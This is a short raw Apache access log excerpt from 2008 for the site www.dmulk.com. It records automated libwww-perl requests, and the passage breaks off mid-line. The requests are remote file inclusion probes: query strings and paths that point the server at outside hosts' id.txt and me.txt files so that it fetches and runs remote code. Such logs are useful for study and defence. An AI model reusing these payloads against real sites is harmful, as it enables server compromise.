195.155.165.40 - - [17/Apr/2008:17:14:55 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.111 - - [17/Apr/2008:17:14:58 -0700] "GET /logs/access_080219.log/!scanhttp://www.stiri-mondene.com//me.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.185.193.111 - - [17/Apr/2008:17:14:59 -0700] "GET /!scanhttp://www.stiri-mondene.com//me.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5